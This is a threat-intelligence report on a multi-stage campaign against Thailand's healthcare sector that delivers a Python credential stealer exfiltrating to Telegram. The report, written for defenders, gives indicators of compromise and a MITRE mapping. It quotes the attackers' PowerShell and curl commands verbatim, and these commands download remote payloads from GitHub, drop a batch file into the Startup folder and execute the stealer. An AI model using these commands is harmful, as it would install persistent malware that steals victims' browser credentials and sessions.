Threat Actors Weaponizing RAR Archives to Target Thailand’s Healthcare Sector

Authors: Vaibhav Krushna Billade, Dixit Panchal & Rumana Siddiqui.

Table of Contents

• Introduction
• Key Targets
• Infection Chain
• Initial Campaign Findings
• Technical Analysis
  • Stage 1: Initial Delivery (RAR Archive)
  • Stage 2: Rouki-Obfuscated Batch Loader
  • Stage 3: Startup Persistence Script
  • Stage 4: Secondary Payload Execution
  • Stage 5: Information Stealer Deployment (sim.py)
• Conclusion
• Seqrite Coverage
• Indicators of Compromise (IOCs)
• MITRE ATT&CK Mapping

Introduction

Seqrite Threat Research Unit (TRU) actively tracks and analyses threat actors and their campaigns, focusing on attribution, infrastructure analysis, and adversary tradecraft. Throughout our research, we have attributed numerous operations to China-aligned and other threat clusters targeting both regional and international entities.

During a recent investigation, we identified an active malware campaign targeting Thailand’s healthcare sector, including Ministry of Health personnel and affiliated healthcare organizations. The campaign leverages healthcare-themed spear-phishing lures distributed through malicious RAR archives containing obfuscated batch scripts and executable payloads. The infection chain employs multiple stages of obfuscation, GitHub-hosted payload delivery, persistence mechanisms, and information-stealing malware designed to establish a foothold within targeted environments while evading detection.

Key Targets

The campaign primarily targets personnel and departments across Thailand’s healthcare ecosystem, including:

• Ministry of Health personnel and government health procurement teams through lures impersonating official medical equipment approval documents.
• Hospital administration staff through fabricated patient admission request documents.
• Radiology and dental clinic staff through spoofed medical records and X-ray inquiry files.
• Clinical and radiological departments through fake patient CT scan result documents.
• Healthcare supply chain and medical equipment procurement teams through Ministry of Health-branded approval documents.

The lure themes suggest deliberate targeting of healthcare-related functions and demonstrate a strong understanding of operational workflows within the sector.

Infection Chain

RAR Archive → Obfuscated BAT Loader → Rouki-Obfuscated Payload Loader → Startup Persistence Script (WindowSecuryt.bat) → Secondary Batch Payload (u-t2.bat) → Python-Based Information Stealer (sim.py) → Telegram Exfiltration Attempts

Initial Campaign Findings

The earliest identified sample associated with the campaign was uploaded on April 7, 2026, while the most recent observed sample was uploaded on June 3, 2026, indicating an active operational window of approximately ten weeks at the time of analysis.

Key Observations

• All identified samples were uploaded from Thailand, suggesting the use of in-country staging infrastructure or compromised local systems for distribution.
• The threat actor distributes malware through RAR archives containing malicious batch scripts and executables disguised as healthcare- and government-related documents.
• Lure filenames are tailored to specific job functions, including administrative, clinical, radiology, and procurement personnel, indicating either prior reconnaissance of healthcare organizations or a broad targeting strategy informed by sector-specific knowledge.
• All observed samples utilize a consistent RAR → BAT → Payload execution chain, suggesting a standardized toolset and repeatable delivery methodology.

Technical Analysis

Stage 1: Initial Delivery (RAR Archive)

The initial infection vector consists of a malicious RAR archive containing an obfuscated batch file that functions as the first-stage loader. Obfuscation is employed extensively to conceal functionality and hinder static analysis.

One observed sample, Health_Ministry_Approved_Equipment_2026.bat, creates a temporary file containing encoded payload data and leverages PowerShell to decode the embedded content. The decoded content is then written to a secondary batch file, which is subsequently executed.

Following execution, temporary artifacts are removed to reduce forensic evidence and complicate post-compromise investigations.

The use of embedded payload data, PowerShell-based decoding routines, and cleanup operations indicates a deliberate effort to conceal malicious functionality and evade security controls.

Stage 2: Rouki-Obfuscated Batch Loader

The decoded payload.bat executed during Stage 1 was heavily obfuscated using a framework identified as Rouki.

Analysis revealed that the script dynamically reconstructs and executes PowerShell commands that download, persist, and execute additional malware components. The use of GitHub-hosted payloads, deceptive file extensions, and multi-stage execution provides operational flexibility while reducing the likelihood of detection.

PowerShell Command 1 – Persistence Deployment

powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile(‘https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png’, ‘C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat’);”

This command downloads a remotely hosted file masquerading as a PNG image and stores it as WindowSecuryt.bat within the Windows Startup folder.

Placement within the Startup directory ensures automatic execution whenever the user logs into the system, thereby establishing persistence.

PowerShell Command 2 – Payload Deployment

powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile(‘https://github.com/d7-te/vtn/raw/main/T2.zip’, ‘C:\Users\Public\Desktops.zip’); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘C:\Users\Public\Desktops.zip’, ‘C:\Users\Public\Desktops’); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”

This command downloads a ZIP archive, extracts its contents to a publicly accessible directory, and executes the embedded Python-based payload (sim.py) using a bundled Python interpreter.

After execution, the ZIP archive is deleted to minimize forensic artifacts and hinder incident response efforts.

Stage 3: Startup Persistence Script (WindowSecuryt.bat)

Analysis of the downloaded WindowSecuryt.bat script revealed that it contains a significant amount of junk data and obfuscation logic similar to that observed in earlier-stage batch loaders. This non-functional content is intended to hinder static analysis and conceal the script’s true execution flow.

Upon execution, the script performs a privilege check and environment setup before reaching its final functional stage, where it reconstructs and executes the following command:

cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”

This command uses curl to download an additional batch payload (u-t2.bat) from a GitHub-hosted repository and stores it in the system’s temporary directory (%TEMP%). The use of the %TEMP% path ensures write access without requiring elevated permissions in most environments.

After successful download, the script immediately executes the payload using the call command, enabling continuation of the multi-stage infection chain.

The combination of Startup-folder persistence and remotely retrievable payloads enables the threat actor to update malicious functionality without modifying the original persistence mechanism.

In addition, the script’s placement within the Windows Startup folder provides persistence, ensuring it is automatically executed upon user logon. This allows the threat actor to repeatedly retrieve and execute updated payloads from the remote GitHub infrastructure without modifying the original persistence mechanism, enabling flexible and long-term control over the infection chain.

Stage 4: Secondary Payload Execution (u-t2.bat)

Analysis of the downloaded u-t2.bat script revealed that it contains junk code and obfuscated sections similar to earlier batch components in the infection chain. These non-functional elements appear at the beginning of the script and are intended to hinder static analysis and conceal the actual execution flow. The meaningful logic is embedded deeper within these obfuscated segments and is resolved only during runtime execution.

The script attempts to relaunch itself with elevated privileges to gain higher-level access on the system.

Upon successful elevation, the script proceeds to execute the next-stage payload while minimizing user visibility.

The final stage of execution triggers the following payload:

powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”

This command launches the previously deployed Python interpreter and executes sim.py while suppressing visible execution windows.

The use of a bundled Python runtime enables execution independent of any existing Python installation on the victim system and reduces deployment dependencies.

Stage 5: Information Stealer Deployment (sim.py)

The final payload identified during analysis is sim.py, a Python-based information stealer executed through the bundled Python environment.

Following execution, the malware terminates multiple web browsers, including Google Chrome, Microsoft Edge, Brave, and other Chromium-based browsers using taskkill commands. This behavior is commonly associated with information-stealing malware seeking access to browser databases, credential stores, cookies, and session artifacts that may otherwise be locked by active processes.

Observed Capabilities

• Collects browser-related data.
• Harvests stored credentials and session information.
• Stages collected data within temporary directories.
• Compresses harvested data into ZIP archives.
• Attempts exfiltration through Telegram-based infrastructure.

Execution logs revealed repeated attempts to transmit stolen data to attacker-controlled Telegram channels using hardcoded bot tokens and chat identifiers via the Telegram Bot API.

The exfiltration requests included victim-specific metadata such as:

• System identifiers
• Username information
• Harvested data counters
• Archive references

Although observed exfiltration attempts failed due to connectivity timeouts when communicating with api.telegram.org, the combination of browser data harvesting, local staging, archive creation, and attempted transmission confirms the payload’s information-stealing capabilities.

Overall, the malware exhibits characteristics commonly associated with modern Python-based stealers, including credential theft, session cookie harvesting, local data staging, archive generation, and Telegram-based exfiltration mechanisms.

The use of GitHub-hosted payload delivery, legitimate system utilities, layered obfuscation, and multi-stage execution contributes to both operational flexibility and defence evasion.

Conclusion

TRU assesses with moderate confidence that this campaign represents a targeted effort against Thailand’s healthcare sector, leveraging healthcare-themed social engineering lures, multi-stage batch loaders, GitHub-hosted payload infrastructure, and Python-based information-stealing malware.

The campaign demonstrates a repeatable delivery methodology consisting of RAR archives, heavily obfuscated batch scripts, persistence through Startup folder abuse, staged payload retrieval, and Telegram-based exfiltration attempts.

While no definitive attribution could be established based on the currently available evidence, the operational consistency observed across samples suggests the activity is being conducted by a single threat actor or closely related cluster. Continued monitoring of associated infrastructure, payload evolution, and victimology may provide additional insights into attribution and campaign objectives.

Organizations within the healthcare sector should remain vigilant against document-themed phishing campaigns, monitor for unauthorized Startup-folder modifications, and restrict the execution of untrusted scripts and binaries obtained from external sources.

Seqrite Coverage:

• Script.Trojan.Downloader.50836.GC
• cld.script.trojan.1759432951

Indicators of Compromise (IOCs):

File Name	SHA256
Health_Ministry_Approved_Equipment_2026.rar	E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B
Health_Ministry_Approved_Equipment_2026.bat	4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0
payload.bat	F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87
WindowSecuryt.bat	74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183
u-t2.bat	7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9
Desktops.zip	523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80
Stealer (SIM.PY)	442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865

 

MITRE ATT&CK Mapping:

Tactic	Technique Name	Technique ID
Initial Access	Phishing: Spear phishing Attachment	T1566.001
Execution	Command and Scripting Interpreter: Windows Command Shell	T1059.003
	Command and Scripting Interpreter: PowerShell	T1059.001
	User Execution: Malicious File	T1204.002
Defense Evasion	Obfuscated Files or Information	T1027
	Masquerading (BAT disguised as PNG/TXT)	T1036
	Indicator Removal on Host: File Deletion	T1070.004
Persistence	Registry Run Keys / Startup Folder	T1547.001
	Scheduled Execution via Startup Folder	T1547
Privilege Escalation	Abuse Elevation Control Mechanism	T1548
Discovery	System Owner/User Discovery	T1033
Credential Access	Credentials from Password Stores	T1555
	Credentials from Web Browsers	T1555.003
Collection	Archive Collected Data	T1560
	Data from Local System	T1005
	Data from Information Repositories	T1213
Command and Control	Ingress Tool Transfer (GitHub-hosted payloads)	T1105
	Application Layer Protocol: Web Protocols (HTTPS)	T1071.001
	Proxy Through Legitimate Services (GitHub)	T1102
Exfiltration	Exfiltration Over Web Service (Telegram Bot API)	T1567
	Exfiltration to Cloud Storage/Web Service	T1567.002